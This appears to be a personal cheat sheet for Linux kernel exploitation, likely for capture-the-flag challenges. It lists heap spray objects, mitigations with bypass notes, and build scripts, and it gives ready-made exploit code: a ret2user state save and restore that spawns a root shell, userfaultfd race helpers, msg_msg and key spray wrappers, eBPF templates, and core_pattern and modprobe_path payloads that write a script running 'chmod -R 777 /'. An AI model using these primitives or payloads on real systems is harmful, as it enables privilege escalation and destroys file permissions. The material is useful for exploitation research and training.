Elastic oeap objects

Struct name Generic caches Constraints
struct user_key_payload kmalloc-[32,32767) only 200 allocation
struct anon_vma_name kmalloc-[8,96)
struct msg_msg kmalloc-[64,4096) cg cache
struct msg_msgseg kmalloc-[8,4096) cg cache
struct drm_property_blob kmalloc-[96,INT_MAX)
char* description in struct key kmalloc-[8,4096 )

Mitigations

  • SMEP (Supervisor Mode Execution Prevention)
    • Why?
      • Prevent RET2USER
    • Activation: -cpu kvm64,+smep in QEMU runtime argument
    • Check: cat /proc/cpuinfo | grep smep
    • Related HW feature: CR4.SMEP
  • SMAP (Supervisor Mode Access Prevention)
    • Why?
      • Prevent Stack Pivot
    • Activation: -cpu kvm64,+smap in QEMU runtime argument
    • Check: cat /proc/cpuinfo | grep smap
    • Related HW feature: CR4.SMAP, EFLAGS.AC (STAC and CLAC Assembly)
  • KASLR (Kernel Address Space Layout Randomization) / FGKASLR (Function Granular KASLR)
    • Entrophy: 0xffffffff81000000 ~ 0xffffffffc0000000
    • Deactivation: -append "...nokaslr..."
  • KPTI (Kernel Page-Table Isolation)
    • Why?
      • Prevent Meltdown
    • Activation: -append "...pti=on..."
    • Check: cat /sys/devices/system/cpu/vulnerabilities/meltdown
    • Related HW feature: CR3
    • Bypass:
      • If SMAP is disabled, mmap(?, ?, ~ | MAP_POPULATE, ?, ?)
      • If ROP is allowed, use ireq in swapgs_restore_regs_and_return_to_usermode
  • KADR (Kernel Address Display Restriction)
    • Why?
      • Hide address in /proc/kallsyms
    • Check: cat /proc/sys/kernel/kptr_restrict
  • Unpack CPIO: cpio -idv <../rootfs.cpio
  • Pack CPIO: find. -print0 | cpio -o --format=newc --null --owner=root > ../rootfs_updated.cpio

Debugging

  • Extract vmlinux from bzImage from https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux:
    •       #!/bin/sh
      # SPDX-License-Identifier: GPL-2.0-only
      # ----------------------------------------------------------------------
      # extract-vmlinux - Extract uncompressed vmlinux from a kernel image
      #
      # Inspired from extract-ikconfig
      # (c) 2009,2010 Dick Streefland <[email protected]>
      #
      # (c) 2011      Corentin Chary <[email protected]>
      #
      # ----------------------------------------------------------------------
      
      check_vmlinux()
      {
      	# Use readelf to check if it's a valid ELF
      	# TODO: find a better to way to check that it's really vmlinux
      	#       and not just an elf
      	readelf -h $1 > /dev/null 2>&1 || return 1
      
      	cat $1
      	exit 0
      }
      
      try_decompress()
      {
      	# The obscure use of the "tr" filter is to work around older versions of
      	# "grep" that report the byte offset of the line instead of the pattern.
      
      	# Try to find the header ($1) and decompress from here
      	for	pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
      	do
      		pos=${pos%%:*}
      		tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
      		check_vmlinux $tmp
      	done
      }
      
      # Check invocation:
      me=${0##*/}
      img=$1
      if	[ $# -ne 1 -o ! -s "$img" ]
      then
      	echo "Usage: $me <kernel-image>" >&2
      	exit 2
      fi
      
      # Prepare temp files:
      tmp=$(mktemp /tmp/vmlinux-XXX)
      trap "rm -f $tmp" 0
      
      # That didn't work, so retry after decompression.
      try_decompress '\037\213\010' xy    gunzip
      try_decompress '\3757zXZ\000' abcde unxz
      try_decompress 'BZh'          xy    bunzip2
      try_decompress '\135\0\0\0'   xxx   unlzma
      try_decompress '\211\114\132' xy    'lzop -d'
      try_decompress '\002!L\030'   xxx   'lz4 -d'
      try_decompress '(\265/\375'   xxx   unzstd
      
      # Finally check for uncompressed images or objects:
      check_vmlinux $img
      
      # Bail out:
      echo "$me: Cannot find vmlinux." >&2

Build Exploit Code

  • Use GLIBC: gcc exploit.c -o exploit -static
  • Use MUSL-GCC: /usr/local/musl/bin/musl-gcc exploit.c -o exploit -static
    • or: gcc -S exploit.c -o exploit.S; musl-gcc exploit.S -o exploit.elf

Code Snippet

      #include <stdio.h>
#include <stdlib.h>

#define KERNEL_BASE_START 0xffffffff81000000ull
#define KERNEL_BASE_END 0xffffffffc0000000ull
#define KERNEL_BASE_MASK (~0x00000000000fffffull)
#define IS_IN_KERNEL_RANGE(addr) \
  ((addr) >= KERNEL_BASE_START && (addr) < KERNEL_BASE_END)

#define MIN(x, y) (x) < (y) ? (x) : (y)
#define MAX(x, y) (x) > (y) ? (x) : (y)

static void get_enter_to_continue(const char* msg);
static void fatal(const char* msg);

static void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}
static void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}
      #include <stdint.h>

uint64_t user_cs, user_ss, user_sp, user_rflags;
static void save_state() {
  asm("mov %[u_cs], cs;\n"
      "mov %[u_ss], ss;\n"
      "mov %[u_sp], rsp;\n"
      "pushf;\n"
      "pop %[u_rflags];\n"
      : [u_cs] "=r"(user_cs), [u_ss] "=r"(user_ss), [u_sp] "=r"(user_sp),
        [u_rflags] "=r"(user_rflags)::"memory");
  printf(
      "[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: "
      "0x%lx\n",
      user_cs, user_ss, user_sp, user_rflags);
}

static void get_shell() {
  puts("[+] Get shell!");
  char* argv[] = {"/bin/sh", NULL};
  char* envp[] = {NULL};
  execve("/bin/sh", argv, envp);
}

static void restore_state() {
  asm volatile(
      "swapgs;\n"
      "mov qword ptr [rsp+0x20], %[u_ss];\n"
      "mov qword ptr [rsp+0x18], %[u_sp];\n"
      "mov qword ptr [rsp+0x10], %[u_rflags];\n"
      "mov qword ptr [rsp+0x08], %[u_cs];\n"
      "mov qword ptr [rsp+0x00], %[u_ret];\n"
      "iretq;\n" ::[u_cs] "r"(user_cs),
      [u_ss] "r"(user_ss), [u_sp] "r"(user_sp), [u_rflags] "r"(user_rflags),
      [u_ret] "r"(get_shell));
}

// For iretq
// *rop_buf++ = (uint64_t)(get_shell); // user_rip
// *rop_buf++ = (uint64_t)(user_cs);
// *rop_buf++ = (uint64_t)(user_rflags);
// *rop_buf++ = (uint64_t)(user_sp);
// *rop_buf++ = (uint64_t)(user_ss);
      #define _GNU_SOURCE
#include <sched.h>

void pin_to_core(size_t core);

void pin_to_core(size_t core) {
  cpu_set_t target_cpu;

  CPU_ZERO(&target_cpu);
  CPU_SET(core, &target_cpu);

  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }
}
      #include <linux/keyctl.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <syscall.h>
#include <unistd.h>

/**
 * type must be "keyring", "user", "logon", or "big_key"
 */
static int32_t sys_add_key(const char *type, const char *desc,
                           const void *payload, size_t plen, int ringid);
static int32_t sys_keyctl(int cmd, ...);
static int32_t sys_revoke_key(int32_t key);
static int32_t sys_update_key(int32_t key, void *payload, size_t size);
static int32_t sys_read_key(int32_t key, char *buf, size_t size);

static int32_t sys_add_key(const char *type, const char *desc,
                           const void *payload, size_t plen, int ringid) {
  return syscall(__NR_add_key, type, desc, payload, plen, ringid);
}
static int32_t sys_keyctl(int cmd, ...) {
  va_list ap;
  long arg2, arg3, arg4, arg5;
  va_start(ap, cmd);
  arg2 = va_arg(ap, long);
  arg3 = va_arg(ap, long);
  arg4 = va_arg(ap, long);
  arg5 = va_arg(ap, long);
  va_end(ap);
  return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5);
}
static int32_t sys_revoke_key(int32_t key) {
  return sys_keyctl(KEYCTL_REVOKE, key);
}
static int32_t sys_read_key(int32_t key, char *buf, size_t size) {
  return sys_keyctl(KEYCTL_READ, key, buf, size);
}
static int32_t sys_update_key(int32_t key, void *payload, size_t size) {
  return sys_keyctl(KEYCTL_UPDATE, key, payload, size);
}
      #define _GNU_SOURCE
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag);
int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag);

int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  int ret = -1;
  memcpy(m->mtext, data, size);
  m->mtype = mtype;

  ret = msgsnd(msgqid, m, size, mflag);

  free(m);
  return ret;
}
int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) {
  struct msgbuf* m = malloc(sizeof(long) + size);
  int ret = -1;
  m->mtype = mtype;

  ret = msgrcv(msgqid, m, size, mtype, mflag);
  memcpy(data, m->mtext, size);

  free(m);
  return ret;
}
      // Check /proc/sys/vm/unprivileged_userfaultfd

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  pthread_t th;
  int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    fatal("syscall(__NR_userfaultfd)");
  }

  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
    fatal("ioctl(UFFDIO_API)");
  }

  uffdio_register.range.start = (uint64_t)addr;
  uffdio_register.range.len = len;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
    fatal("ioctl(UFFDIO_REGISTER)");
  }

  if (pthread_create(&th, NULL, handler, (void*)(uint64_t)uffd) < 0) {
    fatal("pthread_create");
  }

  return uffd;
}

static void* userfault_template_handler(void* args) {
  if (sched_setaffinity(0, sizeof(cpu_set_t), &target_cpu)) {
    fatal("sched_setaffinity");
  }

  int uffd = (int)(long)args;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_template_handler: mmap");
  }

  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;

  puts("[*] userfault_template_handler: waiting for page fault...");
  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if (pollfd.revents & POLLERR || pollfd.revents & POLLHUP) {
      fatal("userfault_template_handler: poll");
    }

    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_template_handler: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal("userfault_template_handler: msg.event != UFFD_EVENT_PAGEFAULT");
    }

    printf("[*] userfault_template_handler: addr=0x%llx, flag=0x%llx\n",
           msg.arg.pagefault.address, msg.arg.pagefault.flags);

    // Main Routine
    copy.src = (uint64_t)page;  // data of page will be data of faulted page

    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_template_handler: ioctl(UFFDIO_COPY)");
    }
  }

  munmap(page, 0x1000);
  return NULL;
}
      // Check /proc/sys/kernel/unprivileged_bpf_disabled

#include <asm-generic/socket.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#include "bpf_insn.h"

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

void bpf_template() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  int mapfd = bpf_map_create(sizeof(uint64_t), 1);
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // Instructions

      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the BPF program
  write(socks[1], "UNIGURI", 7);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}
      /* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */
/* eBPF instruction mini library */
#ifndef __BPF_INSN_H
#define __BPF_INSN_H

struct bpf_insn;

/* ArgX, context and stack frame pointer register positions. Note,
 * Arg1, Arg2, Arg3, etc are used as argument mappings of function
 * calls in BPF_CALL instruction.
 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

/* Additional register mappings for converted user programs. */
#define BPF_REG_A BPF_REG_0
#define BPF_REG_X BPF_REG_7
#define BPF_REG_TMP BPF_REG_8

/* BPF program can access up to 512 bytes of stack space. */
#define MAX_BPF_STACK 512

/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */

#define BPF_ALU64_REG(OP, DST, SRC)                          \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                         \
                     .src_reg = SRC,                         \
                     .off = 0,                               \
                     .imm = 0})

#define BPF_ALU32_REG(OP, DST, SRC)                        \
  ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                       \
                     .src_reg = SRC,                       \
                     .off = 0,                             \
                     .imm = 0})

/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */

#define BPF_ALU64_IMM(OP, DST, IMM)                          \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                         \
                     .src_reg = 0,                           \
                     .off = 0,                               \
                     .imm = IMM})

#define BPF_ALU32_IMM(OP, DST, IMM)                        \
  ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                       \
                     .src_reg = 0,                         \
                     .off = 0,                             \
                     .imm = IMM})

/* Endianess conversion, cpu_to_{l,b}e(), {l,b}e_to_cpu() */

#define BPF_ENDIAN(TYPE, DST, LEN)                              \
  ((struct bpf_insn){.code = BPF_ALU | BPF_END | BPF_SRC(TYPE), \
                     .dst_reg = DST,                            \
                     .src_reg = 0,                              \
                     .off = 0,                                  \
                     .imm = LEN})

/* Short form of mov, dst_reg = src_reg */

#define BPF_MOV64_REG(DST, SRC)                           \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_X, \
                     .dst_reg = DST,                      \
                     .src_reg = SRC,                      \
                     .off = 0,                            \
                     .imm = 0})

#define BPF_MOV32_REG(DST, SRC)                         \
  ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_X, \
                     .dst_reg = DST,                    \
                     .src_reg = SRC,                    \
                     .off = 0,                          \
                     .imm = 0})

/* Short form of mov, dst_reg = imm32 */

#define BPF_MOV64_IMM(DST, IMM)                           \
  ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, \
                     .dst_reg = DST,                      \
                     .src_reg = 0,                        \
                     .off = 0,                            \
                     .imm = IMM})

#define BPF_MOV32_IMM(DST, IMM)                         \
  ((struct bpf_insn){.code = BPF_ALU | BPF_MOV | BPF_K, \
                     .dst_reg = DST,                    \
                     .src_reg = 0,                      \
                     .off = 0,                          \
                     .imm = IMM})

/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */
#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                           \
  ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM,           \
                     .dst_reg = DST,                              \
                     .src_reg = SRC,                              \
                     .off = 0,                                    \
                     .imm = (__u32)(IMM)}),                       \
      ((struct bpf_insn){.code = 0, /* zero is reserved opcode */ \
                         .dst_reg = 0,                            \
                         .src_reg = 0,                            \
                         .off = 0,                                \
                         .imm = ((__u64)(IMM)) >> 32})

#ifndef BPF_PSEUDO_MAP_FD
#define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */

#define BPF_LD_ABS(SIZE, IMM)                                   \
  ((struct bpf_insn){.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
                     .dst_reg = 0,                              \
                     .src_reg = 0,                              \
                     .off = 0,                                  \
                     .imm = IMM})

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                             \
                     .src_reg = SRC,                             \
                     .off = OFF,                                 \
                     .imm = 0})

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                             \
                     .src_reg = SRC,                             \
                     .off = OFF,                                 \
                     .imm = 0})

/* Atomic memory add, *(uint *)(dst_reg + off16) += src_reg */

#define BPF_STX_XADD(SIZE, DST, SRC, OFF)                         \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_XADD, \
                     .dst_reg = DST,                              \
                     .src_reg = SRC,                              \
                     .off = OFF,                                  \
                     .imm = 0})

/* Memory store, *(uint *) (dst_reg + off16) = imm32 */

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                         \
  ((struct bpf_insn){.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
                     .dst_reg = DST,                            \
                     .src_reg = 0,                              \
                     .off = OFF,                                \
                     .imm = IMM})

/*
 * Atomic operations:
 *
 *   BPF_ADD                  *(uint *) (dst_reg + off16) += src_reg
 *   BPF_AND                  *(uint *) (dst_reg + off16) &= src_reg
 *   BPF_OR                   *(uint *) (dst_reg + off16) |= src_reg
 *   BPF_XOR                  *(uint *) (dst_reg + off16) ^= src_reg
 *   BPF_ADD | BPF_FETCH      src_reg = atomic_fetch_add(dst_reg + off16,
 * src_reg); BPF_AND | BPF_FETCH      src_reg = atomic_fetch_and(dst_reg +
 * off16, src_reg); BPF_OR | BPF_FETCH       src_reg = atomic_fetch_or(dst_reg +
 * off16, src_reg); BPF_XOR | BPF_FETCH      src_reg = atomic_fetch_xor(dst_reg
 * + off16, src_reg); BPF_XCHG                 src_reg = atomic_xchg(dst_reg +
 * off16, src_reg) BPF_CMPXCHG              r0 = atomic_cmpxchg(dst_reg + off16,
 * r0, src_reg)
 */

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF)                      \
  ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \
                     .dst_reg = DST,                                \
                     .src_reg = SRC,                                \
                     .off = OFF,                                    \
                     .imm = OP})

/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc +
 * off16 */

#define BPF_JMP_REG(OP, DST, SRC, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                       \
                     .src_reg = SRC,                       \
                     .off = OFF,                           \
                     .imm = 0})

/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_REG(OP, DST, SRC, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
                     .dst_reg = DST,                         \
                     .src_reg = SRC,                         \
                     .off = OFF,                             \
                     .imm = 0})

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16
 */

#define BPF_JMP_IMM(OP, DST, IMM, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                       \
                     .src_reg = 0,                         \
                     .off = OFF,                           \
                     .imm = IMM})

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF)                     \
  ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
                     .dst_reg = DST,                         \
                     .src_reg = 0,                           \
                     .off = OFF,                             \
                     .imm = IMM})

/* Function call */

#define BPF_EMIT_CALL(FUNC)                      \
  ((struct bpf_insn){.code = BPF_JMP | BPF_CALL, \
                     .dst_reg = 0,               \
                     .src_reg = 0,               \
                     .off = 0,                   \
                     .imm = (FUNC)})

/* Raw code statement block */

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
  ((struct bpf_insn){                          \
      .code = CODE, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = IMM})

/* Program exit */

#define BPF_EXIT_INSN()                          \
  ((struct bpf_insn){.code = BPF_JMP | BPF_EXIT, \
                     .dst_reg = 0,               \
                     .src_reg = 0,               \
                     .off = 0,                   \
                     .imm = 0})

#endif
      #include <stdlib.h>

const char* new_core_pattern = "|/tmp/evil.sh";

system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
system("chmod +x /tmp/evil.sh");
system("ulimit -c unlimited");

uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe;
*evil_ptr = 0xdeadbeefcafebebe;
      #include <stdlib.h>

const char* new_modprobe = "/tmp/evil.sh";

system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
system("chmod +x /tmp/evil.sh");
system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
system("chmod +x /tmp/pwn");
system("/tmp/pwn");
      #include <stdio.h>
#include <sys/prctl.h>

const char new_process_name[] = "uniguri";

if (prctl(PR_SET_NAME, new_process_name) == -1) {
  printf("[-] Failed to set process name\n");
  return -1;
}

Scripts

      #!/bin/sh

# Check if an argument is provided
if [ $# -eq 0 ]; then
  echo "Usage: $0 <source_file.c>"
  exit 1
fi

# Extract the base name without the .c extension
SOURCE_FILE=$1
OUTPUT_FILE=$(dirname "$SOURCE_FILE")/$(basename "$SOURCE_FILE" .c)

# Compile the file
musl-gcc "$SOURCE_FILE" -masm=intel -o "$OUTPUT_FILE" -static -pthread

# Check if the compilation was successful
if [ $? -eq 0 ]; then
  echo "Compilation successful: $OUTPUT_FILE"
else
  echo "Compilation failed."
  exit 1
fi
      #!/bin/sh

if [ $# -eq 0 ]; then
  echo "Usage: $0 <exploit_binary>"
  exit 1
fi

cp $1 ./root/
      #!/bin/sh

cd root
find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs_updated.cpio
      #!/bin/sh

if [ $# -eq 0 ]; then
  echo "Usage: $0 <source_file.c>"
  exit 1
fi

SOURCE_FILE=$1
OUTPUT_FILE=$(dirname "$SOURCE_FILE")/$(basename "$SOURCE_FILE" .c)

./build_exploit.sh $SOURCE_FILE
./copy_exploit.sh $OUTPUT_FILE
./pack_rootfs.sh

Reference